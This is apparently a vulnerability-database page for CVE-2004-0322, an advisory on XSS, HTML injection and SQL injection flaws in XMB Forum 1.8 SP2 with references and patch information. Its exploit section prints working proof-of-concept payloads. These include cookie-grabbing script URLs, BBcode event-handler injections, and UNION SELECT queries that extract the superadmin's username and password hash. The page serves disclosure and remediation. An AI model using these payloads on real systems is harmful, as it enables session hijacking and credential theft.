CVE-2004-0322
CVSS 4.3
Published: 2004-02-23 00:00:00
Revised: 2016-10-17 22:43:49

[Original] Multiple cross-site scripting (XSS) vulnerabilities in XMB 1.8 Final SP2 allow remote attackers to execute arbitrary script as other users via the (1) member parameter in member.php, (2) uid parameter in u2uadmin.php, (3) user parameter in editprofile.php, (4) an onmouseover event in an align tag when bbcode is allowed, or (5) img tag where bbcode is allowed.


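[CNNVD] XMB Forum Multiple Input Validation Vulnerabilities (CNNVD-200402-089)

XMB 1.8 Final SP2 contains multiple cross-site scripting (XSS) vulnerabilities. Remote attackers can execute arbitrary script as other users via (1) the member parameter in member.php, (2) the uid parameter in u2uadmin.php, (3) the user parameter in editprofile.php, (4) an onmouseover event in an align tag when bbcode is allowed, or (5) an img tag when bbcode is allowed.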

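- CVSS (Base Score)

CVSS Score: 4.3 [MEDIUM]
Confidentiality Impact: [--]
Integrity Impact: [--]
Availability Impact: [--]
Attack Complexity: [--]
Attack Vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)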

cpe:/a:xmb_forum:xmb:1.8_sp1
cpe:/a:xmb_forum:xmb:1.8
cpe:/a:xmb_forum:xmb:1.8_sp2

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0322
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0322
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-089
(Official data source) CNNVD

- Other Links and Resources

http://archives.neohapsis.com/archives/bugtraq/2004-02/0645.html
(UNKNOWN)  BUGTRAQ  20040225 Re: [waraxe-2004-SA#004] - Multiple vulnerabilities in XMB 1.8 Partagium Final SP2
http://marc.info/?l=bugtraq&m=107756526625179&w=2
(UNKNOWN)  BUGTRAQ  20040223 [waraxe-2004-SA#004] - Multiple vulnerabilities in XMB 1.8 Partagium Final SP2
http://www.securityfocus.com/bid/9726
(VENDOR_ADVISORY)  BID  9726
http://www.xmbforum.com/community/boards/viewthread.php?tid=746859
(UNKNOWN)  CONFIRM  http://www.xmbforum.com/community/boards/viewthread.php?tid=746859
http://xforce.iss.net/xforce/xfdb/15292
(VENDOR_ADVISORY)  XF  xmb-multiple-scripts-xss(15292)
http://xforce.iss.net/xforce/xfdb/15294
(UNKNOWN)  XF  xmb-bbcode-execute-code(15294)

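- Vulnerability Information

XMB Forum Multiple Input Validation Vulnerabilities
Medium Cross-site scripting
2004-02-23 00:00:00 2005-10-20 00:00:00
Remote
XMB 1.8 Final SP2 contains multiple cross-site scripting (XSS) vulnerabilities. Remote attackers can execute arbitrary script as other users via (1) the member parameter in member.php, (2) the uid parameter in u2uadmin.php, (3) the user parameter in editprofile.php, (4) an onmouseover event in an align tag when bbcode is allowed, or (5) an img tag when bbcode is allowed.

- Advisories and Patches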

        The vendor has released XMB 1.8 SP3 to address these issues.
        XMB Forum 1.8
        
        XMB Forum 1.8 SP2
        
        XMB Forum 1.8 SP1
        

- Vulnerability Information (23745)

XMB Forum 1.8 u2uadmin.php uid Parameter XSS (EDBID:23745)
php webapps
2004-02-23 Verified
0 Janek Vind
N/A
source: http://www.securityfocus.com/bid/9726/info

XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.

http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript>		

- Vulnerability Information (23746)

XMB Forum 1.8 editprofile.php user Parameter XSS (EDBID:23746)
php webapps
2004-02-23 Verified
0 Janek Vind
N/A
source: http://www.securityfocus.com/bid/9726/info
 
XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.

http://www.example.com/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript>		

- Vulnerability Information (23747)

XMB Forum 1.8 BBcode align Tag XSS (EDBID:23747)
php webapps
2004-02-23 Verified
0 Janek Vind
N/A
source: http://www.securityfocus.com/bid/9726/info
 
XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.

text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]		

- Vulnerability Information

4041
XMB header.php Encoded Request XSS Filter Bypass
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Disputed

- Vulnerability Description

- Timeline

2004-02-25 Unknown
2004-02-24 Unknown

- Solution

Upgrade to version 1.8 SP3 or 1.9 Nexus BETA or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

- Vulnerability Information

XMB Forum Multiple Input Validation Vulnerabilities
Input Validation Error 9726
Yes No
2004-02-23 12:00:00 2009-07-12 03:06:00
Discovery of these vulnerabilities has been credited to Janek Vind <come2waraxe@yahoo.com>.

- Affected Program Versions

XMB Forum 1.8 SP2
XMB Forum 1.8 SP1
XMB Forum 1.8
XMB Forum 1.8 SP3

- Unaffected Program Versions

XMB Forum 1.8 SP3

- Vulnerability Discussion

XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.

- Exploit

The following proof of concept has been supplied:

Cross-Site Scripting:
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>
http://www.example.com/xmb18sp2/member.php?action=viewpro&member=x<%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript>

HTML Injection:
text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]
text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2

SQL Injection:
http://www.example.com/xmb18sp2/viewthread.php?tid=1&ppp=x
http://www.example.com/xmb18sp2/misc.php?action=list&order=postnum&desc=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&tpp=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x
http://www.example.com/xmb18sp2/stats.php?action=view&addon=x

Getting username for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/*

Getting password's md5 hash for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*

- Solution

The vendor has released XMB 1.8 SP3 to address these issues.


XMB Forum 1.8

XMB Forum 1.8 SP2

XMB Forum 1.8 SP1

- Related References

 

 
